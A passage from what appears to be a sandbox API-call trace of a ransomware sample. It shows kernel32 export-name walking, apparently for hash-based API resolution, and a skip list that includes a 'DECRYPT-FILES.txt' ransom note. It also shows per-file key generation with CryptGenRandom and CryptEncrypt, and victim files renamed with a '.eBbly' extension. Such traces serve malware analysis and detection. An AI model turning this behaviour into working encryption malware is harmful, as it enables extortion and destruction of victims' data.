lpString1="DecodePointer") returned="DecodePointer" [0084.369] lstrlenA (lpString="DECODEPOINTER") returned 13 [0084.369] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DecodeSystemPointer" | out: lpString1="DecodeSystemPointer") returned="DecodeSystemPointer" [0084.369] lstrlenA (lpString="DECODESYSTEMPOINTER") returned 19 [0084.369] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DefineDosDeviceA" | out: lpString1="DefineDosDeviceA") returned="DefineDosDeviceA" [0084.369] lstrlenA (lpString="DEFINEDOSDEVICEA") returned 16 [0084.369] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DefineDosDeviceW" | out: lpString1="DefineDosDeviceW") returned="DefineDosDeviceW" [0084.369] lstrlenA (lpString="DEFINEDOSDEVICEW") returned 16 [0084.369] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DelayLoadFailureHook" | out: lpString1="DelayLoadFailureHook") returned="DelayLoadFailureHook" [0084.369] lstrlenA (lpString="DELAYLOADFAILUREHOOK") returned 20 [0084.369] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteAtom" | out: lpString1="DeleteAtom") returned="DeleteAtom" [0084.369] lstrlenA (lpString="DELETEATOM") returned 10 [0084.369] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteBoundaryDescriptor" | out: lpString1="DeleteBoundaryDescriptor") returned="DeleteBoundaryDescriptor" [0084.370] lstrlenA (lpString="DELETEBOUNDARYDESCRIPTOR") returned 24 [0084.370] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteCriticalSection" | out: lpString1="DeleteCriticalSection") returned="DeleteCriticalSection" [0084.370] lstrlenA (lpString="DELETECRITICALSECTION") returned 21 [0084.370] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFiber" | out: lpString1="DeleteFiber") returned="DeleteFiber" [0084.370] lstrlenA (lpString="DELETEFIBER") returned 11 [0084.370] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFileA" | out: lpString1="DeleteFileA") returned="DeleteFileA" [0084.370] lstrlenA (lpString="DELETEFILEA") returned 11 [0084.370] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFileTransactedA" | out: lpString1="DeleteFileTransactedA") returned="DeleteFileTransactedA" [0084.370] lstrlenA (lpString="DELETEFILETRANSACTEDA") returned 21 [0084.370] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFileTransactedW" | out: lpString1="DeleteFileTransactedW") returned="DeleteFileTransactedW" [0084.370] lstrlenA (lpString="DELETEFILETRANSACTEDW") returned 21 [0084.370] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFileW" | out: lpString1="DeleteFileW") returned="DeleteFileW" [0084.370] lstrlenA (lpString="DELETEFILEW") returned 11 [0084.370] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteProcThreadAttributeList" | out: lpString1="DeleteProcThreadAttributeList") returned="DeleteProcThreadAttributeList" [0084.370] lstrlenA (lpString="DELETEPROCTHREADATTRIBUTELIST") returned 29 [0084.370] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteTimerQueue" | out: lpString1="DeleteTimerQueue") returned="DeleteTimerQueue" [0084.370] lstrlenA (lpString="DELETETIMERQUEUE") returned 16 [0084.370] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteTimerQueueEx" | out: lpString1="DeleteTimerQueueEx") returned="DeleteTimerQueueEx" [0084.370] lstrlenA (lpString="DELETETIMERQUEUEEX") returned 18 [0084.370] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteTimerQueueTimer" | out: lpString1="DeleteTimerQueueTimer") returned="DeleteTimerQueueTimer" [0084.370] lstrlenA (lpString="DELETETIMERQUEUETIMER") returned 21 [0084.370] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteVolumeMountPointA" | out: lpString1="DeleteVolumeMountPointA") returned="DeleteVolumeMountPointA" [0084.370] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTA") returned 23 [0084.370] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteVolumeMountPointW" | out: lpString1="DeleteVolumeMountPointW") returned="DeleteVolumeMountPointW" [0084.370] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTW") returned 23 [0084.370] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeviceIoControl" | out: lpString1="DeviceIoControl") returned="DeviceIoControl" [0084.370] lstrlenA (lpString="DEVICEIOCONTROL") returned 15 [0084.370] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DisableThreadLibraryCalls" | out: lpString1="DisableThreadLibraryCalls") returned="DisableThreadLibraryCalls" [0084.370] lstrlenA (lpString="DISABLETHREADLIBRARYCALLS") returned 25 [0084.370] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DisableThreadProfiling" | out: lpString1="DisableThreadProfiling") returned="DisableThreadProfiling" [0084.370] lstrlenA (lpString="DISABLETHREADPROFILING") returned 22 [0084.370] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DisassociateCurrentThreadFromCallback" | out: lpString1="DisassociateCurrentThreadFromCallback") returned="DisassociateCurrentThreadFromCallback" [0084.370] lstrlenA (lpString="DISASSOCIATECURRENTTHREADFROMCALLBACK") returned 37 [0084.370] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DisconnectNamedPipe" | out: lpString1="DisconnectNamedPipe") returned="DisconnectNamedPipe" [0084.371] lstrlenA (lpString="DISCONNECTNAMEDPIPE") returned 19 [0084.371] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DnsHostnameToComputerNameA" | out: lpString1="DnsHostnameToComputerNameA") returned="DnsHostnameToComputerNameA" [0084.371] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEA") returned 26 [0084.371] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DnsHostnameToComputerNameW" | out: lpString1="DnsHostnameToComputerNameW") returned="DnsHostnameToComputerNameW" [0084.371] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEW") returned 26 [0084.371] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DosDateTimeToFileTime" | out: lpString1="DosDateTimeToFileTime") returned="DosDateTimeToFileTime" [0084.371] lstrlenA (lpString="DOSDATETIMETOFILETIME") returned 21 [0084.371] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DosPathToSessionPathA" | out: lpString1="DosPathToSessionPathA") returned="DosPathToSessionPathA" [0084.371] lstrlenA (lpString="DOSPATHTOSESSIONPATHA") returned 21 [0084.371] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DosPathToSessionPathW" | out: lpString1="DosPathToSessionPathW") returned="DosPathToSessionPathW" [0084.371] lstrlenA (lpString="DOSPATHTOSESSIONPATHW") returned 21 [0084.371] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DuplicateConsoleHandle" | out: lpString1="DuplicateConsoleHandle") returned="DuplicateConsoleHandle" [0084.371] lstrlenA (lpString="DUPLICATECONSOLEHANDLE") returned 22 [0084.371] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DuplicateHandle" | out: lpString1="DuplicateHandle") returned="DuplicateHandle" [0084.371] lstrlenA (lpString="DUPLICATEHANDLE") returned 15 [0084.371] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnableThreadProfiling" | out: lpString1="EnableThreadProfiling") returned="EnableThreadProfiling" [0084.371] lstrlenA (lpString="ENABLETHREADPROFILING") returned 21 [0084.371] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EncodePointer" | out: lpString1="EncodePointer") returned="EncodePointer" [0084.371] lstrlenA (lpString="ENCODEPOINTER") returned 13 [0084.371] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EncodeSystemPointer" | out: lpString1="EncodeSystemPointer") returned="EncodeSystemPointer" [0084.371] lstrlenA (lpString="ENCODESYSTEMPOINTER") returned 19 [0084.371] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EndUpdateResourceA" | out: lpString1="EndUpdateResourceA") returned="EndUpdateResourceA" [0084.371] lstrlenA (lpString="ENDUPDATERESOURCEA") returned 18 [0084.371] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EndUpdateResourceW" | out: lpString1="EndUpdateResourceW") returned="EndUpdateResourceW" [0084.371] lstrlenA (lpString="ENDUPDATERESOURCEW") returned 18 [0084.371] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnterCriticalSection" | out: lpString1="EnterCriticalSection") returned="EnterCriticalSection" [0084.371] lstrlenA (lpString="ENTERCRITICALSECTION") returned 20 [0084.371] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoA" | out: lpString1="EnumCalendarInfoA") returned="EnumCalendarInfoA" [0084.371] lstrlenA (lpString="ENUMCALENDARINFOA") returned 17 [0084.371] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoExA" | out: lpString1="EnumCalendarInfoExA") returned="EnumCalendarInfoExA" [0084.371] lstrlenA (lpString="ENUMCALENDARINFOEXA") returned 19 [0084.371] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoExEx" | out: lpString1="EnumCalendarInfoExEx") returned="EnumCalendarInfoExEx" [0084.371] lstrlenA (lpString="ENUMCALENDARINFOEXEX") returned 20 [0084.371] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoExW" | out: lpString1="EnumCalendarInfoExW") returned="EnumCalendarInfoExW" [0084.371] lstrlenA (lpString="ENUMCALENDARINFOEXW") returned 19 [0084.371] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoW" | out: lpString1="EnumCalendarInfoW") returned="EnumCalendarInfoW" [0084.372] lstrlenA (lpString="ENUMCALENDARINFOW") returned 17 [0084.372] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsA" | out: lpString1="EnumDateFormatsA") returned="EnumDateFormatsA" [0084.372] lstrlenA (lpString="ENUMDATEFORMATSA") returned 16 [0084.372] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsExA" | out: lpString1="EnumDateFormatsExA") returned="EnumDateFormatsExA" [0084.372] lstrlenA (lpString="ENUMDATEFORMATSEXA") returned 18 [0084.372] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsExEx" | out: lpString1="EnumDateFormatsExEx") returned="EnumDateFormatsExEx" [0084.372] lstrlenA (lpString="ENUMDATEFORMATSEXEX") returned 19 [0084.372] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsExW" | out: lpString1="EnumDateFormatsExW") returned="EnumDateFormatsExW" [0084.372] lstrlenA (lpString="ENUMDATEFORMATSEXW") returned 18 [0084.372] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsW" | out: lpString1="EnumDateFormatsW") returned="EnumDateFormatsW" [0084.372] lstrcpyW (in: lpString1=0xfb0000, lpString2="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" | out: lpString1="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" [0084.372] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\-Wm-t35s2VO0tWM.pdf") returned 76 [0084.372] wsprintfW (in: param_1=0x3f2dea4, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\-Wm-t35s2VO0tWM.pdf.eBbly") returned 82 [0084.372] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\-Wm-t35s2VO0tWM.pdf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\s3f3ughxqbgggruc\\-wm-t35s2vo0twm.pdf"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\-Wm-t35s2VO0tWM.pdf.eBbly" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\s3f3ughxqbgggruc\\-wm-t35s2vo0twm.pdf.ebbly"), dwFlags=0x0) returned 1 [0084.373] VirtualFree (lpAddress=0xfa0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0084.373] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0084.373] VirtualFree (lpAddress=0xf90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0084.374] FindNextFileW (in: hFindFile=0x5f8c98, lpFindFileData=0x3f2eed4 | out: lpFindFileData=0x3f2eed4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x96218390, ftCreationTime.dwHighDateTime=0x1d4ca20, ftLastAccessTime.dwLowDateTime=0xa4f81400, ftLastAccessTime.dwHighDateTime=0x1d4cc92, ftLastWriteTime.dwLowDateTime=0xa4f81400, ftLastWriteTime.dwHighDateTime=0x1d4cc92, nFileSizeHigh=0x0, nFileSizeLow=0x3f7d, dwReserved0=0x0, dwReserved1=0x0, cFileName="1fBhJo H3cVvF6LlYw8C.xlsx", cAlternateFileName="1FBHJO~1.XLS")) returned 1 [0084.374] lstrcmpiW (lpString1="1fBhJo H3cVvF6LlYw8C.xlsx", lpString2="DECRYPT-FILES.txt") returned -1 [0084.374] lstrcmpiW (lpString1="1fBhJo H3cVvF6LlYw8C.xlsx", lpString2="autorun.inf") returned -1 [0084.374] lstrcmpiW (lpString1="1fBhJo H3cVvF6LlYw8C.xlsx", lpString2="boot.ini") returned -1 [0084.374] lstrcmpiW (lpString1="1fBhJo H3cVvF6LlYw8C.xlsx", lpString2="desktop.ini") returned -1 [0084.374] lstrcmpiW (lpString1="1fBhJo H3cVvF6LlYw8C.xlsx", lpString2="ntuser.dat") returned -1 [0084.374] lstrcmpiW (lpString1="1fBhJo H3cVvF6LlYw8C.xlsx", lpString2="iconcache.db") returned -1 [0084.374] lstrcmpiW (lpString1="1fBhJo H3cVvF6LlYw8C.xlsx", lpString2="bootsect.bak") returned -1 [0084.374] lstrcmpiW (lpString1="1fBhJo H3cVvF6LlYw8C.xlsx", lpString2="ntuser.dat.log") returned -1 [0084.374] lstrcmpiW (lpString1="1fBhJo H3cVvF6LlYw8C.xlsx", lpString2="thumbs.db") returned -1 [0084.374] lstrcmpiW (lpString1="1fBhJo H3cVvF6LlYw8C.xlsx", lpString2="Bootfont.bin") returned -1 [0084.374] lstrlenW (lpString="1fBhJo H3cVvF6LlYw8C.xlsx") returned 25 [0084.374] lstrcmpiW (lpString1="xlsx", lpString2="lnk") returned 1 [0084.374] lstrcmpiW (lpString1="xlsx", lpString2="exe") returned 1 [0084.374] lstrcmpiW (lpString1="xlsx", lpString2="sys") returned 1 [0084.374] lstrcmpiW (lpString1="xlsx", lpString2="dll") returned 1 [0084.374] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\") returned 57 [0084.374] lstrlenW (lpString="1fBhJo H3cVvF6LlYw8C.xlsx") returned 25 [0084.374] lstrcpyW (in: lpString1=0x3f2e6a4, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\" [0084.374] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\", lpString2="1fBhJo H3cVvF6LlYw8C.xlsx" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\1fBhJo H3cVvF6LlYw8C.xlsx") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\1fBhJo H3cVvF6LlYw8C.xlsx" [0084.374] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xf90000 [0084.374] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\1fBhJo H3cVvF6LlYw8C.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\s3f3ughxqbgggruc\\1fbhjo h3cvvf6llyw8c.xlsx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x428 [0084.375] GetFileSizeEx (in: hFile=0x428, lpFileSize=0x3f2de70 | out: lpFileSize=0x3f2de70*=16253) returned 1 [0084.375] CreateFileMappingW (hFile=0x428, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x42c [0084.375] MapViewOfFile (hFileMappingObject=0x42c, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xfa0000 [0084.375] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x20, pbBuffer=0xf90000 | out: pbBuffer=0xf90000) returned 1 [0084.375] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x8, pbBuffer=0xf90020 | out: pbBuffer=0xf90020) returned 1 [0084.375] VirtualAlloc (lpAddress=0x0, dwSize=0x108, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0084.375] CryptEncrypt (in: hKey=0x5f8a98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xfb0000*, pdwDataLen=0x3f2ddd8*=0x28, dwBufLen=0x100 | out: pbData=0xfb0000*, pdwDataLen=0x3f2ddd8*=0x100) returned 1 [0084.375] VirtualAlloc (lpAddress=0x0, dwSize=0x1001, flAllocationType=0x3000, flProtect=0x4) returned 0xfc0000 [0084.376] VirtualFree (lpAddress=0xfc0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0084.376] UnmapViewOfFile (lpBaseAddress=0xfa0000) returned 1 [0084.377] CloseHandle (hObject=0x42c) returned 1 [0084.377] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0084.377] WriteFile (in: hFile=0x428, lpBuffer=0xfb0000*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x3f2ddf8, lpOverlapped=0x0 | out: lpBuffer=0xfb0000*, lpNumberOfBytesWritten=0x3f2ddf8*=0x108, lpOverlapped=0x0) returned 1 [0084.378] CloseHandle (hObject=0x0) returned 0 [0084.378] CloseHandle (hObject=0x428) returned 1 [0084.378] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0084.378] VirtualFree (lpAddress=0xf90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0084.378] GetTickCount () returned 0x114d8f2 [0084.378] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0xf90000 [0084.379] lstrlenW (lpString="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned 62 [0084.379] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0xfa0000 [0084.379] VirtualAlloc (lpAddress=0x0, dwSize=0x7e, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0084.379] lstrlenA (lpString="kernel32.dll") returned 12 [0084.379] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76c20000 [0084.379] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AcquireSRWLockExclusive" | out: lpString1="AcquireSRWLockExclusive") returned="AcquireSRWLockExclusive" [0084.379] lstrlenA (lpString="ACQUIRESRWLOCKEXCLUSIVE") returned 23 [0084.379] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AcquireSRWLockShared" | out: lpString1="AcquireSRWLockShared") returned="AcquireSRWLockShared" [0084.379] lstrlenA (lpString="ACQUIRESRWLOCKSHARED") returned 20 [0084.379] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ActivateActCtx" | out: lpString1="ActivateActCtx") returned="ActivateActCtx" [0084.379] lstrlenA (lpString="ACTIVATEACTCTX") returned 14 [0084.379] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddAtomA" | out: lpString1="AddAtomA") returned="AddAtomA" [0084.379] lstrlenA (lpString="ADDATOMA") returned 8 [0084.379] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddAtomW" | out: lpString1="AddAtomW") returned="AddAtomW" [0084.379] lstrlenA (lpString="ADDATOMW") returned 8 [0084.380] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddConsoleAliasA" | out: lpString1="AddConsoleAliasA") returned="AddConsoleAliasA" [0084.380] lstrlenA (lpString="ADDCONSOLEALIASA") returned 16 [0084.380] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddConsoleAliasW" | out: lpString1="AddConsoleAliasW") returned="AddConsoleAliasW" [0084.380] lstrlenA (lpString="ADDCONSOLEALIASW") returned 16 [0084.380] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddIntegrityLabelToBoundaryDescriptor" | out: lpString1="AddIntegrityLabelToBoundaryDescriptor") returned="AddIntegrityLabelToBoundaryDescriptor" [0084.380] lstrlenA (lpString="ADDINTEGRITYLABELTOBOUNDARYDESCRIPTOR") returned 37 [0084.380] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddLocalAlternateComputerNameA" | out: lpString1="AddLocalAlternateComputerNameA") returned="AddLocalAlternateComputerNameA" [0084.380] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEA") returned 30 [0084.380] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddLocalAlternateComputerNameW" | out: lpString1="AddLocalAlternateComputerNameW") returned="AddLocalAlternateComputerNameW" [0084.380] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEW") returned 30 [0084.380] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddRefActCtx" | out: lpString1="AddRefActCtx") returned="AddRefActCtx" [0084.380] lstrlenA (lpString="ADDREFACTCTX") returned 12 [0084.380] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddSIDToBoundaryDescriptor" | out: lpString1="AddSIDToBoundaryDescriptor") returned="AddSIDToBoundaryDescriptor" [0084.380] lstrlenA (lpString="ADDSIDTOBOUNDARYDESCRIPTOR") returned 26 [0084.380] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddSecureMemoryCacheCallback" | out: lpString1="AddSecureMemoryCacheCallback") returned="AddSecureMemoryCacheCallback" [0084.380] lstrlenA (lpString="ADDSECUREMEMORYCACHECALLBACK") returned 28 [0084.380] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddVectoredContinueHandler" | out: lpString1="AddVectoredContinueHandler") returned="AddVectoredContinueHandler" [0084.380] lstrlenA (lpString="ADDVECTOREDCONTINUEHANDLER") returned 26 [0084.380] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddVectoredExceptionHandler" | out: lpString1="AddVectoredExceptionHandler") returned="AddVectoredExceptionHandler" [0084.380] lstrlenA (lpString="ADDVECTOREDEXCEPTIONHANDLER") returned 27 [0084.380] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AdjustCalendarDate" | out: lpString1="AdjustCalendarDate") returned="AdjustCalendarDate" [0084.380] lstrlenA (lpString="ADJUSTCALENDARDATE") returned 18 [0084.380] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AllocConsole" | out: lpString1="AllocConsole") returned="AllocConsole" [0084.380] lstrlenA (lpString="ALLOCCONSOLE") returned 12 [0084.380] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AllocateUserPhysicalPages" | out: lpString1="AllocateUserPhysicalPages") returned="AllocateUserPhysicalPages" [0084.380] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGES") returned 25 [0084.380] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AllocateUserPhysicalPagesNuma" | out: lpString1="AllocateUserPhysicalPagesNuma") returned="AllocateUserPhysicalPagesNuma" [0084.380] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGESNUMA") returned 29 [0084.380] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ApplicationRecoveryFinished" | out: lpString1="ApplicationRecoveryFinished") returned="ApplicationRecoveryFinished" [0084.380] lstrlenA (lpString="APPLICATIONRECOVERYFINISHED") returned 27 [0084.380] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ApplicationRecoveryInProgress" | out: lpString1="ApplicationRecoveryInProgress") returned="ApplicationRecoveryInProgress" [0084.380] lstrlenA (lpString="APPLICATIONRECOVERYINPROGRESS") returned 29 [0084.380] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AreFileApisANSI" | out: lpString1="AreFileApisANSI") returned="AreFileApisANSI" [0084.380] lstrlenA (lpString="AREFILEAPISANSI") returned 15 [0084.381] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AssignProcessToJobObject" | out: lpString1="AssignProcessToJobObject") returned="AssignProcessToJobObject" [0084.381] lstrlenA (lpString="ASSIGNPROCESSTOJOBOBJECT") returned 24 [0084.381] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AttachConsole" | out: lpString1="AttachConsole") returned="AttachConsole" [0084.381] lstrlenA (lpString="ATTACHCONSOLE") returned 13 [0084.381] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BackupRead" | out: lpString1="BackupRead") returned="BackupRead" [0084.381] lstrlenA (lpString="BACKUPREAD") returned 10 [0084.381] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BackupSeek" | out: lpString1="BackupSeek") returned="BackupSeek" [0084.381] lstrlenA (lpString="BACKUPSEEK") returned 10 [0084.381] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BackupWrite" | out: lpString1="BackupWrite") returned="BackupWrite" [0084.381] lstrlenA (lpString="BACKUPWRITE") returned 11 [0084.381] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseCheckAppcompatCache" | out: lpString1="BaseCheckAppcompatCache") returned="BaseCheckAppcompatCache" [0084.381] lstrlenA (lpString="BASECHECKAPPCOMPATCACHE") returned 23 [0084.381] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseCheckAppcompatCacheEx" | out: lpString1="BaseCheckAppcompatCacheEx") returned="BaseCheckAppcompatCacheEx" [0084.381] lstrlenA (lpString="BASECHECKAPPCOMPATCACHEEX") returned 25 [0084.381] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseCheckRunApp" | out: lpString1="BaseCheckRunApp") returned="BaseCheckRunApp" [0084.381] lstrlenA (lpString="BASECHECKRUNAPP") returned 15 [0084.381] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseCleanupAppcompatCacheSupport" | out: lpString1="BaseCleanupAppcompatCacheSupport") returned="BaseCleanupAppcompatCacheSupport" [0084.381] lstrlenA (lpString="BASECLEANUPAPPCOMPATCACHESUPPORT") returned 32 [0084.381] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseDllReadWriteIniFile" | out: lpString1="BaseDllReadWriteIniFile") returned="BaseDllReadWriteIniFile" [0084.381] lstrlenA (lpString="BASEDLLREADWRITEINIFILE") returned 23 [0084.381] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseDumpAppcompatCache" | out: lpString1="BaseDumpAppcompatCache") returned="BaseDumpAppcompatCache" [0084.381] lstrlenA (lpString="BASEDUMPAPPCOMPATCACHE") returned 22 [0084.381] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseFlushAppcompatCache" | out: lpString1="BaseFlushAppcompatCache") returned="BaseFlushAppcompatCache" [0084.381] lstrlenA (lpString="BASEFLUSHAPPCOMPATCACHE") returned 23 [0084.381] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseFormatObjectAttributes" | out: lpString1="BaseFormatObjectAttributes") returned="BaseFormatObjectAttributes" [0084.381] lstrlenA (lpString="BASEFORMATOBJECTATTRIBUTES") returned 26 [0084.381] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseFormatTimeOut" | out: lpString1="BaseFormatTimeOut") returned="BaseFormatTimeOut" [0084.381] lstrlenA (lpString="BASEFORMATTIMEOUT") returned 17 [0084.381] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseGenerateAppCompatData" | out: lpString1="BaseGenerateAppCompatData") returned="BaseGenerateAppCompatData" [0084.381] lstrlenA (lpString="BASEGENERATEAPPCOMPATDATA") returned 25 [0084.381] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseGetNamedObjectDirectory" | out: lpString1="BaseGetNamedObjectDirectory") returned="BaseGetNamedObjectDirectory" [0084.381] lstrlenA (lpString="BASEGETNAMEDOBJECTDIRECTORY") returned 27 [0084.381] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseInitAppcompatCacheSupport" | out: lpString1="BaseInitAppcompatCacheSupport") returned="BaseInitAppcompatCacheSupport" [0084.382] lstrlenA (lpString="BASEINITAPPCOMPATCACHESUPPORT") 